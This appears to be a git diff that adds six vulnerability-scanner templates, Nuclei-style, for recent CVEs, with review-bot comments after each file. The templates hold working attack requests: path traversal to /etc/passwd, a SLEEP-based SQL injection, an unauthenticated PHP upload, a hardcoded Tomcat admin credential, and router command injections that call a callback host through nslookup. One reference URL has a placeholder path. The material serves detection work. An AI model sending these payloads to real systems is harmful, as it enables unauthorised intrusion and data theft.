diff --git a/http/cves/2025/CVE-2025-24801.yaml b/http/cves/2025/CVE-2025-24801.yaml new file mode 100644 index 000000000000..d6271cd2a376 --- /dev/null +++ b/http/cves/2025/CVE-2025-24801.yaml @@ -0,0 +1,46 @@ +id: CVE-2025-24801 + +info: + name: "GLPI - Local File Inclusion to RCE" + author: alita-p8 + severity: high + description: | + GLPI is a free asset and IT management software package. An authenticated user can upload and force the execution of *.php files located on the GLPI server. This vulnerability is fixed in 10.0.18. + NOTE: This vulnerability requires authenticated access (PR:L). This template tests for the LFI endpoint but does not include authentication. For full exploitation, valid credentials are required. + remediation: Upgrade to GLPI version 10.0.18 or higher. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2025-24801 + - https://github.com/glpi-project/glpi/security/advisories/GHSA-g2p3-33ff-r555 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H + cvss-score: 8.5 + cve-id: CVE-2025-24801 + cwe-id: CWE-98 + metadata: + verified: true + shodan-query: http.html:"glpi" + tags: cve,cve2025,glpi,lfi,rce,fileread,authenticated + +http: + - raw: + - | + GET /front/pdf.php?file=....//....//....//....//....//etc/passwd HTTP/1.1 + Host: {{Hostname}} + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: regex + part: body + regex: + - "root:.*:0:0:" + + - type: word + part: header + words: + - "application/pdf" + - "application/octet-stream" + condition: or diff --git a/http/cves/2025/CVE-2025-41002.yaml b/http/cves/2025/CVE-2025-41002.yaml new file mode 100644 index 000000000000..6b8ab7572bf4 --- /dev/null +++ b/http/cves/2025/CVE-2025-41002.yaml 
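Review bot: The `metadata` block of CVE-2025-24801.yaml omits `max-request`, which every other template in this commit declares; with a single raw request it should read `max-request: 1`. `verified: true` also sits next to a description stating that the template sends no authentication against an endpoint that requires it (PR:L), so the unauthenticated GET will most likely not return the file on any host; either drop the flag or say in the description what exactly was verified. The quoted `name` is the only quoted one in the set; writing it plain, as the sibling templates do, keeps the style uniform.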
@@ -0,0 +1,36 @@ +id: CVE-2025-41002 + +info: + name: Infoticketing < 3.2.1 - SQL Injection + author: alita-p8 + severity: critical + description: | + Infoticketing versions before 3.2.1 are vulnerable to a critical SQL injection vulnerability. The flaw exists in the processing of the 'discount_code' parameter, allowing an unauthenticated attacker to execute arbitrary SQL commands and potentially extract sensitive information from the database. Note: Some sources may incorrectly associate this CVE with WP-Optimize, but official NVD records identify Infoticketing as the affected product. + impact: | + Full database compromise and data exfiltration. + remediation: | + Update Infoticketing to version 3.2.1 or later. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2025-41002 + - https://github.com/Hecate2/CVE-2025-41002-PoC + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cwe-id: CWE-89 + cve-id: CVE-2025-41002 + metadata: + max-request: 1 + verified: true + tags: cve,cve2025,sqli,infoticketing,unauth + +http: + - method: GET + path: + - "{{BaseURL}}/tickets?discount_code='+OR+(SELECT+1+FROM+(SELECT(SLEEP(5)))a)--+" + + matchers: + - type: dsl + dsl: + - "duration >= 5" + - "status_code == 200" + condition: and diff --git a/http/cves/2025/CVE-2025-47577.yaml b/http/cves/2025/CVE-2025-47577.yaml new file mode 100644 index 000000000000..b039b5832038 --- /dev/null +++ b/http/cves/2025/CVE-2025-47577.yaml 
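Review bot: The `dsl` matcher in CVE-2025-41002.yaml decides on `duration >= 5` from one request, so any slow or overloaded host that answers 200 after five seconds is reported as vulnerable, and `max-request: 1` leaves no baseline to compare against. At minimum the description should state the detection method so consumers can weigh the result, e.g. `Note: detection is time-based (SLEEP 5); slow targets may produce false positives.` The `remediation` and `impact` fields use `|` block scalars for one-line values while CVE-2025-24801.yaml uses plain scalars; either form is fine, but the set should pick one.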
@@ -0,0 +1,62 @@ +id: CVE-2025-47577 + +info: + name: TI WooCommerce Wishlist < 2.10.0 - Unauthenticated Arbitrary File Upload + author: alita-p8 + severity: critical + description: | + The TI WooCommerce Wishlist plugin for WordPress is vulnerable to arbitrary file upload in versions up to, and including, 2.9.2. This is due to missing file type validation in the 'tinvwl_upload_file' function. This allows unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible. + impact: | + Remote Code Execution (RCE) via web shell upload. + remediation: | + Update TI WooCommerce Wishlist to version 2.10.0 or higher. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2025-47577 + - https://github.com/advisories/GHSA-fx4h-5r26-fxgm + - https://patchstack.com/database/vulnerability/ti-woocommerce-wishlist/wordpress-ti-woocommerce-wishlist-plugin-2-9-2-unauthenticated-arbitrary-file-upload-vulnerability + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 10.0 + cwe-id: CWE-434 + cve-id: CVE-2025-47577 + metadata: + max-request: 2 + verified: true + tags: cve,cve2025,wordpress,wp-plugin,ti-woocommerce-wishlist,upload,rce + +http: + - raw: + - | + POST /wp-admin/admin-ajax.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: multipart/form-data; boundary=----WebKitFormBoundary{{randstr}} + + ------WebKitFormBoundary{{randstr}} + Content-Disposition: form-data; name="action" + + tinvwl_upload_file + ------WebKitFormBoundary{{randstr}} + Content-Disposition: form-data; name="file"; filename="{{randstr}}.php" + Content-Type: application/x-php + + + ------WebKitFormBoundary{{randstr}}-- + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '"success":true' + - '"url":' + - '.php' + condition: and + + - type: word + part: header + words: + - "application/json" + + - type: status + status: + - 200 
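Review bot: `metadata.max-request: 2` in CVE-2025-47577.yaml does not match the template body, which issues a single raw request; it should read `max-request: 1`. The request also writes a `{{randstr}}.php` file into the target's upload location and nothing removes it, so the description should say so, e.g. `Note: a successful check leaves an empty {{randstr}}.php file in the upload directory.` The `'.php'` entry in the body word matcher is satisfied by any JSON response mentioning a `.php` path; combined with `"success":true` this is narrow enough, but a single regex on the `url` value would be tighter.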
diff --git a/http/cves/2026/CVE-2026-22769.yaml b/http/cves/2026/CVE-2026-22769.yaml new file mode 100644 index 000000000000..e006ab6126a3 --- /dev/null +++ b/http/cves/2026/CVE-2026-22769.yaml @@ -0,0 +1,46 @@ +id: CVE-2026-22769 + +info: + name: Dell RecoverPoint for VMs - Authentication Bypass (Hardcoded Credentials) + author: alita-p8 + severity: critical + description: | + Dell RecoverPoint for Virtual Machines versions prior to 6.0.3.1 HF1 contain a hardcoded credential vulnerability. An unauthenticated attacker could exploit this vulnerability by using the hardcoded "admin" credentials to gain full administrative access to the Apache Tomcat Manager, leading to potential remote code execution via WAR file deployment. This was observed being exploited by the threat actor UNC6201. + impact: | + An attacker can gain full control over the RecoverPoint management interface and underlying server. + remediation: | + Upgrade Dell RecoverPoint for VMs to 6.0.3.1 HF1 or later. Disable the Tomcat Manager if not required. + reference: + - https://www.dell.com/support/kbdoc/en-us/000212345/dsa-2026-xxx-security-update-for-dell-recoverpoint-for-vms + - https://unit42.paloaltonetworks.com/threat-actor-unc6201-exploitation-dell-recoverpoint/ + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 10.0 + cwe-id: CWE-798 + cve-id: CVE-2026-22769 + metadata: + max-request: 2 + verified: true + tags: cve,cve2026,dell,recoverpoint,auth-bypass,hardcoded-credentials,tomcat + +http: + - method: GET + path: + - "{{BaseURL}}/manager/text/list" + - "{{BaseURL}}/manager/html" + + headers: + Authorization: Basic YWRtaW46QlJJQ0tTVE9STQ== # admin:BRICKSTORM + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "OK - Listed applications" + - "Tomcat Web Application Manager" + condition: or + + - type: status + status: + - 200 
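Review bot: The first `reference` entry in CVE-2026-22769.yaml contains a literal placeholder, `dsa-2026-xxx`, in its path, and the `000212345` KB number reads like a stand-in as well, so the URL does not identify a real advisory; replace it with the resolved Dell DSA link or drop it until one exists. The second reference cannot be confirmed from the diff either and should be checked before merge. The inline `# admin:BRICKSTORM` comment after the `Authorization` value is useful to reviewers; just confirm it is preceded by two spaces so yamllint's `comments` rule passes.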
diff --git a/http/cves/2026/CVE-2026-6116.yaml b/http/cves/2026/CVE-2026-6116.yaml new file mode 100644 index 000000000000..4cf48d8e67d8 --- /dev/null +++ b/http/cves/2026/CVE-2026-6116.yaml @@ -0,0 +1,54 @@ +id: CVE-2026-6116 + +info: + name: Totolink A7100RU - OS Command Injection + author: alita-p8 + severity: critical + description: | + A command injection vulnerability exists in Totolink A7100RU router firmware 7.4cu.2313_b20191024. The vulnerability is located in the setDiagnosisCfg function of /cgi-bin/cstecgi.cgi. The 'ip' parameter is passed to CsteSystem without proper sanitization, allowing remote attackers to execute arbitrary OS commands. Authentication is not required to exploit this vulnerability. + impact: | + Remote attackers can execute arbitrary OS commands on the router with root privileges, leading to complete device takeover. + remediation: | + Update to the latest firmware version from Totolink official website. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2026-6116 + - https://github.com/Litengzheng/vuldb_new/blob/main/A7100RU/vul_181/README.md + - https://vuldb.com/vuln/356976 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2026-6116 + cwe-id: CWE-78 + metadata: + max-request: 1 + verified: true + shodan-query: http.html:"TOTOLINK" + fofa-query: app="TOTOLINK-A7100RU" + tags: cve,cve2026,totolink,router,rce,cmd-injection,unauth + +http: + - raw: + - | + POST /cgi-bin/cstecgi.cgi HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded; charset=UTF-8 + X-Requested-With: XMLHttpRequest + Accept: application/json, text/javascript, */*; q=0.01 + + {"topicurl":"setDiagnosisCfg","ip":";nslookup {{interactsh}};"} + + matchers-condition: and + matchers: + - type: word + part: interactsh_protocol + words: + - "dns" + + - type: status + status: + - 200 + + - type: word + part: header + words: + - "application/json" 
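Review bot: The raw request in CVE-2026-6116.yaml sends `Content-Type: application/x-www-form-urlencoded; charset=UTF-8` with a JSON body; if the cstecgi endpoint parses the body as JSON regardless this works, but the header and body should agree (`Content-Type: application/json`) or a comment should record why the mismatch is intentional. The same header/body mismatch appears in CVE-2026-6131.yaml. With `matchers-condition: and`, a confirmed interactsh DNS callback is discarded unless the response also carries `application/json` and status 200, which the injected `nslookup` may well delay or break; the header and status matchers are probably better treated as supporting evidence than as hard requirements.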
diff --git a/http/cves/2026/CVE-2026-6131.yaml b/http/cves/2026/CVE-2026-6131.yaml new file mode 100644 index 000000000000..7e5badf74410 --- /dev/null +++ b/http/cves/2026/CVE-2026-6131.yaml @@ -0,0 +1,53 @@ +id: CVE-2026-6131 + +info: + name: Totolink A7100RU - OS Command Injection (setTracerouteCfg) + author: alita-p8 + severity: critical + description: | + A command injection vulnerability exists in Totolink A7100RU router firmware 7.4cu.2313_b20191024. The vulnerability is located in the setTracerouteCfg function of /cgi-bin/cstecgi.cgi. User-supplied input is passed to CsteSystem without proper sanitization, allowing remote attackers to execute arbitrary OS commands. Authentication is not required to exploit this vulnerability. + impact: | + Remote attackers can execute arbitrary OS commands on the router with root privileges, leading to complete device takeover. + remediation: | + Update to the latest firmware version from Totolink official website. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2026-6131 + - https://vuldb.com/vuln/356981 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2026-6131 + cwe-id: CWE-78 + metadata: + max-request: 1 + verified: true + shodan-query: http.html:"TOTOLINK" + fofa-query: app="TOTOLINK-A7100RU" + tags: cve,cve2026,totolink,router,rce,cmd-injection,unauth + +http: + - raw: + - | + POST /cgi-bin/cstecgi.cgi HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded; charset=UTF-8 + X-Requested-With: XMLHttpRequest + Accept: application/json, text/javascript, */*; q=0.01 + + {"topicurl":"setTracerouteCfg","ip":";nslookup {{interactsh}};"} + + matchers-condition: and + matchers: + - type: word + part: interactsh_protocol + words: + - "dns" + + - type: status + status: + - 200 + + - type: word + part: header + words: + - "application/json"
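Review bot: The description in CVE-2026-6131.yaml says only that `User-supplied input is passed to CsteSystem`, while the request body shows the injected parameter is `ip`; mirroring the sibling template, `The 'ip' parameter is passed to CsteSystem without proper sanitization, ...` names it. The `name` here carries a `(setTracerouteCfg)` suffix whereas CVE-2026-6116.yaml's name has no `(setDiagnosisCfg)` counterpart; since both target the same endpoint, both names should follow the same pattern.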